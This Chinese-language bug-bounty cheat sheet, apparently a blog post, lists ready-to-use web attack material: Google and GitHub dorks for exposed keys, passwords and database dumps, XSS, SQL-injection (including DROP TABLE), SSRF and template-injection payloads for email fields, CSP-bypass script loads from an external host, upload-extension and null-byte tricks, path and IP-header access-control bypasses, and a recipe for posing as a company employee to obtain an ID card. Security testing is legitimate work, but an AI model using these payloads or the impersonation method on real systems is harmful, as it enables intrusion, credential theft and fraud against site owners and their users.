①可能隐藏的注册页面
/register Laravel
/user/register Drupal
/wp-login.php?action=register WordPress
/register eZ Publish
②google常见的可能挖掘的页面
inurl:example.com intitle:"index of"
inurl:example.com intitle:"index of /" "*key.pem"
inurl:example.com ext:log
inurl:example.com intitle:"index of" ext:sql|xls|xml|json|csv
inurl:example.com "MYSQL_ROOT_PASSWORD:" ext:env OR ext:yml -git
③Drupal可能的隐藏页面
https://target.com/node/1
④挖数据库备份
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
setup.sql
sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
⑤邮箱payload组合拳
1.xss
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
2.sql注入
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
3.ssrf伪造
john.doe@abc123.burpcollaborator.net
john.doe@[127.0.0.1]
4.模板注入
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
⑥机构获取身份证方法
导致原因:
注册为员工会导致要求获得“仅限员工私下发售”,并最终获得“身份证”。
方法:
Google上搜索Target的员工优惠:inurl:“目标名称”员工提供
找到了向目标公司提供报价的网站。
发现报价仅限于员工。
尝试在“ 员工ID ”字段中使用随机数进行注册
由于未验证 “ 员工ID ” ,因此成功注册为员工。
注册为员工会导致要求私人报价。
该网站还提供了“ 身份证 ”,可用于证明我们是目标公司的合法雇员。
⑦nice的xss
<!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\NJ.₨?/>
<!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\NJ.₨?/>
<!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//NJ.₨></script>">
<!-- Just a casual script -->
<script/src=//NJ.₨></script>
<!-- If you control the name of the window -->
<iframe/onload=src=top.name>
<!-- If you control the name, will work on Firefox in any context, will fail in chromium in DOM -->
<svg/onload=eval(name)>
<!-- If you control the URL -->
<svg/onload=eval(`'`+URL)>
利用xss+文件上传
如果找到图像的文件上传功能,请尝试引入文件名中带有XSS(跨站点脚本)有效负载的图像,如下
<img src=x onerror=alert('XSS')>.png
"><img src=x οnerrοr=alert('XSS')>.png
"><svg onmouseover=alert(1)>.svg
<<script>alert('xss')<!--a-->a.png
⑧快速找web结构方法
即获得了目录机构状况时
wget -r --no-parent target.com/dir
⑨找文件上传典型可能出现问题的扩展名
ASP:
.aspx
.config
.ashx
.asmx
.aspq
.axd
.cshtm
.cshtml
.rem
.soap
.vbhtm
.vbhtml
.asa
.asp
.cer
.shtml
PHP:
.php
.php5
.php3
.php2
.shtml
.html
.php.png
(双扩展名攻击)
特殊绕过
file.jpg%00shell.php
shell.php%00file.jpg
shell.php%00.jpg
⑩绕重定向类
#如最开始
https://target.com/admin/ –> HTTP 302(重定向到登录页面)
https://target.com/admin..;/ –> HTTP 200 OK
#绕方法
https://target.com/../admin
https://target.com/whatever/..;/admin
十一.
绕waf类–>代理方法
X-Originating-IP:IP
X-Forward-For:IP
X-Remote-IP:IP
X-Remote-Addr:IP
X-Client-IP:IP
X-Host:IP
X-Forwared-Host:IP
绕waf的IP范围
192.168.0.0/16
172.16.0.0/12
127.0.0.0/8
10.0.0.0/8
十二,json中可能存在敏感信息泄露
如不带json时访问得到的
请求:响应:
GET /ResetPassword HTTP/1.1
{"email":"victim@example.com"}
HTTP/1.1 200 OK
带json–>获取了token
GET /ResetPassword.json HTTP/1.1
{"email":"victim@example.com"}
HTTP/1.1 200 OK
{"success":"true","token":"596a96-cc7bf-9108c-d896f-33c44a-edc8a"}
十三,特权操作
如最初
请求:
GET /delete?user=test HTTP/1.1
响应:
HTTP/1.1 401 Unauthorized
现在让我们尝试一下:
添加后
请求:响应:
GET /delete?user=test HTTP/1.1
X-Custom-IP-Authorization: 127.0.0.1
HTTP/1.1 302 Found
这在前端使用添加的自定义HTTP标头(X-Custom-IP-Authorization)的情况下可能有效-例如,当它用于标识通过负载均衡器连接到Web服务器的客户端的原始IP地址时。
通过将自己标识为127.0.0.1,我们可以规避Web应用程序的访问控制并执行特权操作。
十四,github找网站密码方法
“target.com” send_keys
“target.com” password
“target.com” api_key
“target.com” apikey
“target.com” jira_password
“target.com” root_password
“target.com” access_token
“target.com” config
“target.com” client_secret
“target.com” user auth
十五
成为赏金猎人的方法
睡得好
了解漏洞类型(owasp)
每次专注于1个
阅读与练习
了解如何寻找和利用
了解如何分析网站
查看其他人的行为(报告)
学习一种编程语言
制作自己的脚本
不要着急
1046
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
